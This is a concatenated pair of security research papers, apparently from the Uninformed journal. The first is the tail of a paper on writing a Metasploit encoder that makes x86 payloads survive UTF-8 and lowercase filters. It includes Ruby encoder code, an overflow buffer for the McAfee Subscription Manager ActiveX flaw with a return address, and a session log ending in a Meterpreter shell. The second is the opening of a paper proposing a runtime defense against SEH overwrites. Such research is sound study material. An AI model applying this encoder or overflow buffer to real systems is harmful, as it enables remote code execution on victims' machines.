    'License'     => MSF_LICENSE,
    'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
    'Decoder'     =>
      {
        'KeySize'   => 4,
        'BlockSize' => 4,
      })
end
|
||||
|
||||
|
||||
With all of the boilerplate code out of the way, it's time to finally get into
|
||||
implementing the actual encoder. When implementing encoder modules in the 3.0
|
||||
version of the Metasploit Framework, there are a few key methods that can be
|
||||
overridden by a derived class. These methods are described in detail in the
|
||||
developer's guide, so an abbreviated explanation of only those useful to this
|
||||
encoder will be given here. Each method will be explained in its own
|
||||
individual section.
|
||||
|
||||
4.1) decoder_stub
|
||||
|
||||
First and foremost, the decoder_stub method gives an encoder module the
|
||||
opportunity to dynamically generate a decoder stub. The framework's idea of
|
||||
the decoder stub is equivalent to the stub header described in chapter 3. In
|
||||
this case, it must simply provide a buffer whose assembly will set up a
|
||||
specific register to point to the start of the encoded data blocks as described
|
||||
in section 3.1. The completed version of this method might look something like
|
||||
this:
|
||||
|
||||
|
||||
def decoder_stub(state)
  # Number of four byte blocks, with the raw length rounded up to a multiple of four
  len = ((state.buf.length + 3) & (~0x3)) / 4

  # Optional extra distance between the address in ecx and the start of the stub
  off = (datastore['BufferOffset'] || 0).to_i

  decoder =
    "\x6a" + [len].pack('C')      + # push len
    "\x6b\x3c\x24\x0b"            + # imul 0xb
    "\x60"                        + # pusha
    "\x03\x0c\x24"                + # add ecx, [esp]
    "\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
    "\x03\x0c\x24"                + # add ecx, [esp]
    "\x6a\x04"                      # push byte 0x4

  # The encoded data blocks are accumulated here by encode_block
  state.context = ''

  return decoder
end
|
||||
|
||||
|
||||
In this routine, the length of the raw buffer, as found through
|
||||
state.buf.length, is aligned up to a four byte boundary and then divided by
|
||||
four. Following that, an optional buffer offset is stored in the off local
|
||||
variable. The purpose of the BufferOffset optional value is to allow exploits
|
||||
to cause the encoder to account for extra size overhead in the ecx register
|
||||
when doing its calculations. The decoder stub is then generated using the
|
||||
calculated length and offset to produce the stub header. The stub header is
|
||||
then returned to the caller.
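
The same construction can be tried outside the framework. The sketch below is
a standalone approximation of decoder_stub, not the module's code: it takes the
raw length and offset as plain arguments instead of reading state.buf and
datastore, and the range check is an added assumption based on the single-byte
push operands.

```ruby
# Standalone approximation of the stub header generation; no framework required.
def build_stub_header(raw_len, buffer_offset = 0)
  blocks = ((raw_len + 3) & ~0x3) / 4   # round up to a whole number of blocks
  if blocks > 0x7f || 0x11 + buffer_offset > 0x7f
    raise ArgumentError, 'value does not fit in a 7-bit safe push byte operand'
  end

  "\x6a".b + [blocks].pack('C') +                 # push byte <blocks>
    "\x6b\x3c\x24\x0b".b +                        # imul edi,[esp],byte 0xb
    "\x60".b +                                    # pusha
    "\x03\x0c\x24".b +                            # add ecx,[esp]
    "\x6a".b + [0x11 + buffer_offset].pack('C') + # push byte 0x11 + offset
    "\x03\x0c\x24".b +                            # add ecx,[esp]
    "\x6a\x04".b                                  # push byte 0x4
end

# A 72 byte payload with an 8 byte offset reproduces the listing in section 3.1.
puts build_stub_header(72, 8).unpack('H*').first
# 6a126b3c240b60030c246a19030c246a04
```

With these inputs the block count is 0x12 and the second push operand is 0x19,
matching the disassembly of the stub header shown earlier.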
|
||||
|
||||
|
||||
4.2) encode_block
|
||||
|
||||
The next important method to override is the encode_block method. This method
|
||||
is used by the framework to allow an encoder to encode a single block and
|
||||
return the resultant encoded buffer. The size of each block is provided to the
|
||||
framework through the encoder's information hash. For this particular encoder,
|
||||
the block size is four bytes. The implementation of the encode_block routine is
|
||||
as simple as trying to encode the block using either the add instruction or the
|
||||
sub instruction. Which instruction is used will depend on the bytes in the
|
||||
block that is being encoded.
|
||||
|
||||
|
||||
def encode_block(state, block)
  # Prefer the add form of the transform
  buf = try_add(state, block)

  # Fall back to the sub form if add cannot produce every byte
  if (buf.nil?)
    buf = try_sub(state, block)
  end

  # Neither form can represent this block
  if (buf.nil?)
    raise BadcharError.new(state.encoded, 0, 0, 0)
  end

  buf
end
|
||||
|
||||
|
||||
The first thing encode_block tries is add. The try_add method is implemented as
|
||||
shown below:
|
||||
|
||||
|
||||
def try_add(state, block)
  buf  = "\x68"   # push dword
  vbuf = ''       # immediate operand bytes
  ctx  = ''       # encoded block bytes

  block.each_byte { |b|
    # add cannot produce these values from two valid characters
    return nil if (b == 0xff or b == 0x01 or b == 0x00)

    begin
      xv = rand(b - 1) + 1
    end while (is_badchar(state, xv) or is_badchar(state, b - xv))

    vbuf += [xv].pack('C')
    ctx  += [b - xv].pack('C')
  }

  # pop edi / add [ecx], edi / add ecx, [esp]
  buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"

  state.context += ctx

  return buf
end
|
||||
|
||||
|
||||
The try_add routine enumerates each byte in the block, trying to find a random
|
||||
byte that, when added to another random byte, produces the byte value in the
|
||||
block. The algorithm it uses to accomplish this is to loop selecting a random
|
||||
value between 1 and the actual value. From there a check is made to ensure
|
||||
that both values are within the valid character set. If they are both valid,
|
||||
then one of the values is stored as one of the bytes of the 32-bit immediate
|
||||
operand to the push instruction that is part of the decode transform for the
|
||||
current block. The second value is appended to the encoded block context.
|
||||
After all bytes have been considered, the instructions that compose the decode
|
||||
transform are completed and the encoded block context is appended to the string
|
||||
of encoded blocks. Finally, the decode transform is returned to the framework.
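
The per-byte search performed by try_add can be illustrated without the
framework. The following sketch enumerates every valid split of a byte instead
of picking one at random, and it uses the paper's valid character set in place
of the framework's is_badchar check. Both valid_char? and add_pairs are
hypothetical names.

```ruby
# Valid set used in this paper: 0x01-0x40 and 0x5b-0x7f.
def valid_char?(b)
  (0x01..0x40).cover?(b) || (0x5b..0x7f).cover?(b)
end

# Every way to write byte b as x + y with both halves in the valid set.
def add_pairs(b)
  (1...b).select { |x| valid_char?(x) && valid_char?(b - x) }.map { |x| [x, b - x] }
end

x, y = add_pairs(0x80).sample   # try_add picks at random; any pair works
puts format('0x%02x + 0x%02x = 0x%02x', x, y, x + y)
puts add_pairs(0x01).empty?     # true
```

An empty result corresponds to the cases where try_add returns nil and the
encoder has to fall back to the sub form.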
|
||||
|
||||
In the event that any of the bytes that compose the block being encoded by
|
||||
try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this
|
||||
happens, the encode_block routine will attempt to encode the block using the sub
|
||||
instruction. The implementation of the try_sub routine is shown below:
|
||||
|
||||
|
||||
def try_sub(state, block)
  buf   = "\x68"   # push dword
  vbuf  = ''       # immediate operand bytes (x)
  ctx   = ''       # encoded block bytes (y)
  carry = 0

  block.each_byte { |b|
    # sub cannot produce these values from two valid characters
    return nil if (b == 0x80 or b == 0x81 or b == 0x7f)

    x          = 0
    y          = 0
    prev_carry = carry

    begin
      carry = prev_carry

      if (b > 0x80)
        # y - x wraps below zero, so the next byte must absorb a borrow
        diff  = 0x100 - b
        y     = rand(0x80 - diff - 1).to_i + 1
        x     = (0x100 - (b - y + carry))
        carry = 1
      else
        diff  = 0x7f - b
        x     = rand(diff - 1) + 1
        y     = (b + x + carry) & 0xff
        carry = 0
      end

    end while (is_badchar(state, x) or is_badchar(state, y))

    vbuf += [x].pack('C')
    ctx  += [y].pack('C')
  }

  # pop edi / sub [ecx], edi / add ecx, [esp]
  buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"

  state.context += ctx

  return buf
end
|
||||
|
||||
|
||||
Unlike the try_add routine, the try_sub routine is a little bit more
|
||||
complicated, perhaps unnecessarily. The main reason for this is that
|
||||
subtracting two 32-bit values has to take into account things like carrying
|
||||
from one digit to another. The basic idea is the same. Each byte in the block
|
||||
is enumerated. If the byte is above 0x80, the routine calculates the
|
||||
difference between 0x100 and the byte. From there, it calculates the y value
|
||||
as a random number between 1 and 0x80 minus the difference. Using the y value,
|
||||
it generates the x value as 0x100 minus the quantity (byte value - y + carry),
where carry is the current carry flag. To better understand this, consider the
following scenario.
|
||||
|
||||
Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
|
||||
is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
|
||||
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
|
||||
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.
|
||||
|
||||
However, if the byte value is less than 0x80, then a different method is used
|
||||
to select the x and y values. In this case, the difference is calculated as
|
||||
0x7f minus the value of the current byte. The value of x is then assigned a
|
||||
random value between 1 and the difference. The value of y is then calculated
|
||||
as the current byte plus x plus the carry flag. For example, if the value is
|
||||
0x24, then the values could be calculated as described in the following
|
||||
scenario.
|
||||
|
||||
First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
|
||||
0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be
|
||||
calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.
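
Both scenarios treat a byte on its own. The Ruby sketch below, offered as an
illustration with hypothetical helper names, places them in the same dword to
show why the carry has to be tracked: the 0x84 byte borrows from its neighbor,
so the y value for the following 0x24 byte must be one higher than in the
standalone scenario.

```ruby
# Interpret four bytes as a little-endian 32-bit value.
def le32(bytes)
  bytes.pack('C4').unpack('V').first
end

# What "sub [ecx],edi" leaves in memory: the encoded block minus the immediate.
def sub_decode(encoded_bytes, immediate_bytes)
  [(le32(encoded_bytes) - le32(immediate_bytes)) & 0xffffffff].pack('V').bytes
end

immediate     = [0x7f, 0x18, 0x20, 0x20]   # x values
with_carry    = [0x03, 0x3d, 0x30, 0x30]   # y values, second byte adjusted for the borrow
without_carry = [0x03, 0x3c, 0x30, 0x30]   # y values, borrow ignored

puts sub_decode(with_carry, immediate).map { |b| format('%02x', b) }.join(' ')
# 84 24 10 10
puts sub_decode(without_carry, immediate).map { |b| format('%02x', b) }.join(' ')
# 84 23 10 10
```

Ignoring the borrow leaves the second byte off by one, which is the situation
that the carry variable in try_sub is meant to avoid.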
|
||||
|
||||
Given these two methods of calculating the individual byte values, it's
|
||||
possible to encode all bytes with the exception of 0x7f, 0x80, and 0x81. If any
|
||||
one of these three bytes is encountered, the try_sub routine will return nil
|
||||
and the encoding will fail. Otherwise, the routine will complete in a fashion
|
||||
similar to the try_add routine. However, rather than using an add instruction,
|
||||
it uses the sub instruction.
|
||||
|
||||
4.3) encode_end
|
||||
|
||||
|
||||
With all the encoding cruft out of the way, the final method that needs to be
|
||||
overridden is encode_end. In this method, the state.context attribute is
|
||||
appended to the state.encoded. The purpose of the state.context attribute is
|
||||
to hold all of the encoded data blocks that are created over the course of
|
||||
encoding each block. The state.encoded attribute is the actual decoder
|
||||
including the stub header, the decode transformations, and finally, the encoded
|
||||
data blocks.
|
||||
|
||||
|
||||
def encode_end(state)
  # Append the accumulated encoded data blocks after the decode transforms
  state.encoded += state.context
end
|
||||
|
||||
|
||||
Once encoding completes, the result might be a disassembly that looks something
|
||||
like this:
|
||||
|
||||
|
||||
$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
|
||||
./msfencode -e x86/avoid_utf8_tolower -t raw | \
|
||||
ndisasm -u -
|
||||
[*] x86/avoid_utf8_tolower succeeded, final size 47
|
||||
|
||||
00000000 6A02 push byte +0x2
|
||||
00000002 6B3C240B imul edi,[esp],byte +0xb
|
||||
00000006 60 pusha
|
||||
00000007 030C24 add ecx,[esp]
|
||||
0000000A 6A11 push byte +0x11
|
||||
0000000C 030C24 add ecx,[esp]
|
||||
0000000F 6A04 push byte +0x4
|
||||
00000011 683C0C190D push dword 0xd190c3c
|
||||
00000016 5F pop edi
|
||||
00000017 0139 add [ecx],edi
|
||||
00000019 030C24 add ecx,[esp]
|
||||
0000001C 68696A6060 push dword 0x60606a69
|
||||
00000021 5F pop edi
|
||||
00000022 0139 add [ecx],edi
|
||||
00000024 030C24 add ecx,[esp]
|
||||
00000027 06 push es
|
||||
00000028 1467 adc al,0x67
|
||||
0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c
|
||||
0000002E 6C insb
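
One way to convince oneself that this output decodes back to the original
input is to walk the layout statically. The sketch below is an assumption-laden
model rather than an emulator: it assumes a 0x11 byte stub header, 0xb byte
transforms laid out as shown above, and encoded blocks immediately after the
last transform. The method name simulate_decode is hypothetical.

```ruby
HEADER_SIZE   = 0x11
TRANSFORM_LEN = 0x0b

# Statically "run" the decode transforms over the trailing encoded blocks.
def simulate_decode(encoded)
  count = encoded.getbyte(1)   # operand of the first push byte
  data  = encoded.byteslice(HEADER_SIZE + count * TRANSFORM_LEN, count * 4)

  count.times.map do |i|
    t      = encoded.byteslice(HEADER_SIZE + i * TRANSFORM_LEN, TRANSFORM_LEN)
    imm    = t.byteslice(1, 4).unpack('V').first     # push dword imm32
    opcode = t.getbyte(6)                            # 0x01 = add [ecx],edi, 0x29 = sub
    block  = data.byteslice(i * 4, 4).unpack('V').first
    result = opcode == 0x01 ? block + imm : block - imm
    [result & 0xffffffff].pack('V')
  end.join
end

# The 47 bytes from the disassembly above.
sample = ['6a026b3c240b60030c246a11030c246a04' \
          '683c0c190d5f0139030c24' \
          '68696a60605f0139030c24' \
          '0614676b63626c6c'].pack('H*')

puts simulate_decode(sample).unpack('H*').first   # 42208078cccccccc
```

The result matches the eight bytes that were piped into msfencode, and the
trailing instructions in the listing (push es, adc, imul, insb) are simply the
encoded blocks being disassembled as if they were code.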
|
||||
|
||||
|
||||
5) Applying the Encoder
|
||||
|
||||
The whole reason that this encoder was originally needed was to take advantage
|
||||
of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
|
||||
that the encoder has been implemented, all that's left is to try it out and see
|
||||
if it works. To test this against a Windows XP SP0 target, the overflow buffer
|
||||
might be constructed as follows.
|
||||
|
||||
First, a string of 2972 random text characters must be generated. The return
|
||||
address should follow the random character string. An example of a valid
|
||||
return address for this target is 0x7605122f which is the location of a jmp esp
|
||||
instruction in shell32.dll. Immediately following the return address in the
|
||||
overflow buffer should be a series of five instructions:
|
||||
|
||||
|
||||
00000000 60 pusha
|
||||
00000001 6A01 push byte +0x1
|
||||
00000003 6A01 push byte +0x1
|
||||
00000005 6A01 push byte +0x1
|
||||
00000007 61 popa
|
||||
|
||||
|
||||
The purpose of this series of instructions is to cause the value of esp at the
|
||||
time that the pusha occurs to be popped into the ecx register. As the reader
|
||||
should recall, the ecx register is used as the base address for the decoder
|
||||
stub. However, since esp doesn't actually point to the base address of the
|
||||
decoder stub, the encoder must be informed that 8 extra bytes must be added to
|
||||
ecx when accounting for the extra offset into the encoded data blocks. This is
|
||||
conveyed by setting the BufferOffset value to 8. After these five instructions
|
||||
should come the encoded version of the payload. To better visualize this,
|
||||
consider the following snippet from the exploit:
|
||||
|
||||
|
||||
buf =
|
||||
Rex::Text.rand_text(2972, payload_badchars) +
|
||||
[ ret ].pack('V') +
|
||||
"\x60" + # pusha
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x61" + # popa
|
||||
p.encoded
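
The register shuffle performed by the five instructions can be checked with a
small model of pusha and popa. This is a sketch for illustration only: the
register file is a plain hash, the stack is an array of dwords, and the entry
value of esp is an arbitrary assumption.

```ruby
# Order in which pusha stores the general purpose registers.
PUSHA_ORDER = %i[eax ecx edx ebx esp ebp esi edi].freeze

def pusha(regs, stack)
  original_esp = regs[:esp]   # pusha stores the value esp had before the instruction
  PUSHA_ORDER.each do |r|
    stack.push(r == :esp ? original_esp : regs[r])
    regs[:esp] -= 4
  end
end

def push(regs, stack, value)
  stack.push(value)
  regs[:esp] -= 4
end

def popa(regs, stack)
  PUSHA_ORDER.reverse_each do |r|
    value = stack.pop
    regs[:esp] += 4
    regs[r] = value unless r == :esp   # popa discards the saved esp slot
  end
end

# Run pusha / push 1 / push 1 / push 1 / popa and return the final ecx.
def ecx_after_shuffle(entry_esp)
  regs  = { eax: 0xa, ecx: 0xc, edx: 0xd, ebx: 0xb,
            esp: entry_esp, ebp: 0xe, esi: 0x5, edi: 0x7 }
  stack = []
  pusha(regs, stack)
  3.times { push(regs, stack, 1) }
  popa(regs, stack)
  regs[:ecx]
end

puts format('0x%08x', ecx_after_shuffle(0x0012f000))   # 0x0012f000
```

The three extra pushes shift every popped slot by three positions, so the esp
value saved by pusha lands in ecx. The five instructions occupy eight bytes,
which is where the BufferOffset value of 8 comes from.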
|
||||
|
||||
|
||||
With the overflow buffer ready to go, the only thing left to do is fire off an
exploit attempt by having the machine browse to the malicious website:
|
||||
|
||||
|
||||
msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
|
||||
[*] Started reverse handler
|
||||
[*] Using URL: http://x.x.x.3:8080/foo
|
||||
[*] Server started.
|
||||
[*] Exploit running as background job.
|
||||
msf exploit(mcafee_mcsubmgr_vsprintf) >
|
||||
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
|
||||
[*] Sending stage (2834 bytes)
|
||||
[*] Sleeping before handling stage...
|
||||
[*] Uploading DLL (73739 bytes)...
|
||||
[*] Upload completed.
|
||||
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)
|
||||
|
||||
msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter >
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
The purpose of this paper was to illustrate the process of implementing a
|
||||
custom encoder for the x86 architecture. In particular, the encoder
|
||||
described in this paper was designed to make it possible to encode payloads in
|
||||
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
|
||||
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
|
||||
control was used because of its restrictions on uppercase characters. While
|
||||
many readers may never find it necessary to implement an encoder, it's
|
||||
nevertheless a necessary topic to understand for those who are interested in
|
||||
exploitation research.
|
||||
|
||||
|
||||
A. References
|
||||
|
||||
eEye. McAfee Subscription Manager Stack Buffer Overflow.
|
||||
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
Metasploit Staff. Metasploit 3.0 Developer's Guide.
|
||||
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
Spoonm. Recent Shellcode Developments.
|
||||
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
SkyLined. Alpha 2.
|
||||
http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
|
||||
|
782
uninformed/5.2.txt
Normal file
|
@ -0,0 +1,782 @@
|
|||
Preventing the Exploitation of SEH Overwrites
|
||||
9/2006
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper proposes a technique that can be used to prevent
|
||||
the exploitation of SEH overwrites on 32-bit Windows applications
|
||||
without requiring any recompilation. While Microsoft has attempted to
|
||||
address this attack vector through changes to the exception dispatcher
|
||||
and through enhanced compiler support, such as with /SAFESEH and /GS,
|
||||
the majority of benefits they offer are limited to image files that have
|
||||
been compiled to make use of the compiler enhancements. This limitation
|
||||
means that without all image files being compiled with these
|
||||
enhancements, it may still be possible to leverage an SEH overwrite to
|
||||
gain code execution. In particular, many third-party applications are
|
||||
still vulnerable to SEH overwrites even on the latest versions of
|
||||
Windows because they have not been recompiled to incorporate these
|
||||
enhancements. To that point, the technique described in this paper does
|
||||
not rely on any compile time support and instead can be applied at
|
||||
runtime to existing applications without any noticeable performance
|
||||
degradation. This technique is also backward compatible with all
|
||||
versions of Windows NT+, thus making it a viable and proactive solution
|
||||
for legacy installations.
|
||||
|
||||
Thanks: The author would like to thank all of the people who have helped
|
||||
with offering feedback and ideas on this technique. In particular, the
|
||||
author would like to thank spoonm, H D Moore, Skywing, Richard Johnson,
|
||||
and Alexander Sotirov.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
Like other operating systems, the Windows operating system finds itself
|
||||
vulnerable to the same classes of vulnerabilities that affect other
|
||||
platforms, such as stack-based buffer overflows and heap-based buffer
|
||||
overflows. Where the platforms differ is in terms of how these
|
||||
vulnerabilities can be leveraged to gain code execution. In the case of
|
||||
a conventional stack-based buffer overflow, the overwriting of the
|
||||
return address is the most obvious and universal approach. However,
|
||||
unlike other platforms, the Windows platform has a unique vector that
|
||||
can, in many cases, be used to gain code execution through a stack-based
|
||||
overflow that is more reliable than overwriting the return address.
|
||||
This vector is known as a Structured Exception Handler (SEH) overwrite.
|
||||
This attack vector was publicly discussed for the first time, as far as
|
||||
the author is aware, by David Litchfield in his paper entitled Defeating
|
||||
the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
|
||||
Windows 2003 Server. However, exploits had been using this technique
|
||||
prior to the publication, so it is unclear who originally found the
|
||||
technique.
|
||||
|
||||
In order to completely understand how to go about protecting against SEH
|
||||
overwrites, it's prudent to first spend some time describing the
|
||||
intention of the facility itself and how it can be abused to gain code
|
||||
execution. To provide this background information, a description of
|
||||
structured exception handling will be given in section 2.1. Section 2.2
|
||||
provides an illustration of how an SEH overwrite can be used to gain
|
||||
code execution. If the reader already understands how structured
|
||||
exception handling works and can be exploited, feel free to skip ahead.
|
||||
The design of the technique that is the focus of this paper will be
|
||||
described in chapter 3 followed by a description of a proof of concept
|
||||
implementation in chapter 4. Finally, potential compatibility issues are
|
||||
noted in chapter 5.
|
||||
|
||||
|
||||
2.1) Structured Exception Handling
|
||||
|
||||
|
||||
Structured Exception Handling (SEH) is a uniform system for dispatching
|
||||
and handling exceptions that occur during the normal course of a
|
||||
program's execution. This system is similar in spirit to the way that
|
||||
UNIX derivatives use signals to dispatch and handle exceptions, such as
|
||||
through SIGPIPE and SIGSEGV. SEH, however, is a more generalized and
|
||||
powerful system for accomplishing this task, in the author's opinion.
|
||||
Microsoft's integration of SEH spans both user-mode and kernel-mode and
|
||||
is a licensed implementation of what is described in a patent owned by
|
||||
Borland. In fact, this patent is one of the reasons why open source
|
||||
operating systems have not chosen to integrate this style of exception
|
||||
dispatching.
|
||||
|
||||
In terms of implementation, structured exception handling works by
|
||||
defining a uniform way of handling all exceptions that occur during the
|
||||
normal course of process execution. In this context, an exception is
|
||||
defined as an event that occurs during execution that necessitates some
|
||||
form of extended handling. There are two primary types of exceptions.
|
||||
The first type, known as a hardware exception, is used to categorize
|
||||
exceptions that originate from hardware. For example, when a program
|
||||
makes reference to an invalid memory address, the processor will raise
|
||||
an exception through an interrupt that gives the operating system an
|
||||
opportunity to handle the error. Other examples of hardware exceptions
|
||||
include illegal instructions, alignment faults, and other
|
||||
architecture-specific issues. The second type of exception is known as
|
||||
a software exception. A software exception, as one might expect,
|
||||
originates from software rather than from the hardware. For example, in
|
||||
the event that a process attempts to close an invalid handle, the
|
||||
operating system may generate an exception.
|
||||
|
||||
One of the reasons that the word structured is included in structured
|
||||
exception handling is that it is used to dispatch
|
||||
both hardware and software exceptions. This generalization makes it
|
||||
possible for applications to handle all types of exceptions using a
|
||||
common system, thus allowing for greater application flexibility when it
|
||||
comes to error handling.
|
||||
|
||||
The most important detail of SEH, insofar as it pertains to this
|
||||
document, is the mechanism through which applications can dynamically
|
||||
register handlers to be called when various types of exceptions occur.
|
||||
The act of registering an exception handler is most easily described as
|
||||
inserting a function pointer into a chain of function pointers that are
|
||||
called whenever an exception occurs. Each exception handler in the
|
||||
chain is given the opportunity to either handle the exception or pass it
|
||||
on to the next exception handler.
|
||||
|
||||
At a higher level, the majority of compiler-generated C/C++ functions
|
||||
will register exception handlers in their prologue and remove them in
|
||||
their epilogue. In this way, the exception handler chain mirrors the
|
||||
structure of a thread's stack in that they are both LIFOs
|
||||
(last-in-first-out). The exception handler that was registered last
|
||||
will be the first to be removed from the chain, much the same as the last
|
||||
function to be called will be the first to be returned from.
|
||||
|
||||
To understand how the process of registering an exception handler
|
||||
actually works in practice, it makes sense to analyze code that makes
|
||||
use of exception handling. For instance, the code below illustrates what
|
||||
would be required to catch all exceptions and then display the type of
|
||||
exception that occurred:
|
||||
|
||||
|
||||
__try
|
||||
{
|
||||
...
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
printf("Exception code: %.8x\n", GetExceptionCode());
|
||||
}
|
||||
|
||||
In the event that an exception occurs from code inside of the __try / __except
|
||||
block, the printf call will be issued and GetExceptionCode will return the
|
||||
actual exception that occurred. For instance, if code made reference to an
|
||||
invalid memory address, the exception code would be 0xc0000005, or
|
||||
EXCEPTION_ACCESS_VIOLATION. To completely understand how this works, it is
|
||||
necessary to dive deeper and take a look at the assembly that is generated from
|
||||
the C code described above. When disassembled, the code looks something like
|
||||
what is shown below:
|
||||
|
||||
|
||||
00401000 55 push ebp
|
||||
00401001 8bec mov ebp,esp
|
||||
00401003 6aff push 0xff
|
||||
00401005 6818714000 push 0x407118
|
||||
0040100a 68a4114000 push 0x4011a4
|
||||
0040100f 64a100000000 mov eax,fs:[00000000]
|
||||
00401015 50 push eax
|
||||
00401016 64892500000000 mov fs:[00000000],esp
|
||||
0040101d 83c4f4 add esp,0xfffffff4
|
||||
00401020 53 push ebx
|
||||
00401021 56 push esi
|
||||
00401022 57 push edi
|
||||
00401023 8965e8 mov [ebp-0x18],esp
|
||||
00401026 c745fc00000000 mov dword ptr [ebp-0x4],0x0
|
||||
0040102d c6050000000001 mov byte ptr [00000000],0x1
|
||||
00401034 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
|
||||
0040103b eb2b jmp ex!main+0x68 (00401068)
|
||||
0040103d 8b45ec mov eax,[ebp-0x14]
|
||||
00401040 8b08 mov ecx,[eax]
|
||||
00401042 8b11 mov edx,[ecx]
|
||||
00401044 8955e4 mov [ebp-0x1c],edx
|
||||
00401047 b801000000 mov eax,0x1
|
||||
0040104c c3 ret
|
||||
|
||||
0040104d 8b65e8 mov esp,[ebp-0x18]
|
||||
00401050 8b45e4 mov eax,[ebp-0x1c]
|
||||
00401053 50 push eax
|
||||
00401054 6830804000 push 0x408030
|
||||
00401059 e81b000000 call ex!printf (00401079)
|
||||
0040105e 83c408 add esp,0x8
|
||||
00401061 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
|
||||
00401068 8b4df0 mov ecx,[ebp-0x10]
|
||||
0040106b 64890d00000000 mov fs:[00000000],ecx
|
||||
00401072 5f pop edi
|
||||
00401073 5e pop esi
|
||||
00401074 5b pop ebx
|
||||
00401075 8be5 mov esp,ebp
|
||||
00401077 5d pop ebp
|
||||
00401078 c3 ret
|
||||
|
||||
|
||||
The actual registration of the exception handler all occurs behind the scenes
|
||||
in the C code. However, in the assembly code, the registration of the
|
||||
exception handler starts at 0x0040100a and spans four instructions. It is
|
||||
these four instructions that are responsible for registering the exception
|
||||
handler for the calling thread. The way that this actually works is by
|
||||
chaining an EXCEPTION_REGISTRATION_RECORD to the front of the list of exception
|
||||
handlers. The head of the list of already registered exception handlers is
|
||||
found in the ExceptionList attribute of the NT_TIB structure. If no exception
|
||||
handlers are registered, this value will be set to 0xffffffff. The NT_TIB
|
||||
structure makes up the first part of the TEB, or Thread Environment Block,
|
||||
which is an undocumented structure used internally by Windows to keep track of
|
||||
per-thread state in user-mode. A thread's TEB can be accessed in a
|
||||
position-independent fashion by referencing addresses relative to the fs
|
||||
segment register. For example, the head of the exception list chain can be
|
||||
obtained through fs:[0].
|
||||
|
||||
To make sense of the four assembly instructions that register the custom
|
||||
exception handler, each of the four instructions will be described
|
||||
individually. For reference purposes, the layout of the
|
||||
EXCEPTION_REGISTRATION_RECORD is described below:
|
||||
|
||||
|
||||
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
|
||||
+0x004 Handler : Ptr32
|
||||
|
||||
|
||||
1. push 0x4011a4
|
||||
|
||||
The first instruction pushes the address of the CRT-generated _except_handler3
|
||||
symbol. This routine is responsible for dispatching general exceptions that
|
||||
are registered through the __except compiler intrinsic. The key thing to note
|
||||
here is that the virtual address of a function is pushed onto the stack that is
|
||||
expected to be referenced in the event that an exception is thrown. This push
|
||||
operation is the first step in dynamically constructing an
|
||||
EXCEPTION_REGISTRATION_RECORD on the stack by first setting the Handler
|
||||
attribute.
|
||||
|
||||
2. mov eax,fs:[00000000]
|
||||
|
||||
The second instruction takes the current pointer to the first
|
||||
EXCEPTION_REGISTRATION_RECORD and stores it in eax.
|
||||
|
||||
3. push eax
|
||||
|
||||
The third instruction takes the pointer to the first exception registration
|
||||
record in the exception list and pushes it onto the stack. This, in turn, sets
|
||||
the Next attribute of the record that is being dynamically generated on the
|
||||
stack. Once this instruction completes, a populated
|
||||
EXCEPTION_REGISTRATION_RECORD will exist on the stack that takes the following
|
||||
form:
|
||||
|
||||
|
||||
+0x000 Next : 0x0012ffb0
|
||||
+0x004 Handler : 0x004011a4 ex!_except_handler3+0
|
||||
|
||||
|
||||
4. mov fs:[00000000],esp
|
||||
|
||||
Finally, the dynamically generated exception registration record is stored as
|
||||
the first exception registration record in the list for the current thread.
|
||||
This completes the process of inserting a new registration record into the
|
||||
chain of exception handlers.
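
The four steps above can be mirrored in portable C. The following is only a
simulation under stated assumptions, not the code the compiler emits: the
names registration_record, exception_list_head, register_handler and
unregister_handler are hypothetical, a plain global stands in for fs:[0], and
CHAIN_END plays the role of the 0xffffffff terminator.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for a handler; the real prototype is richer. */
typedef int (*handler_fn)(void);

/* Simulated EXCEPTION_REGISTRATION_RECORD (names are illustrative). */
typedef struct registration_record {
    struct registration_record *next;     /* +0x000 Next    */
    handler_fn                  handler;  /* +0x004 Handler */
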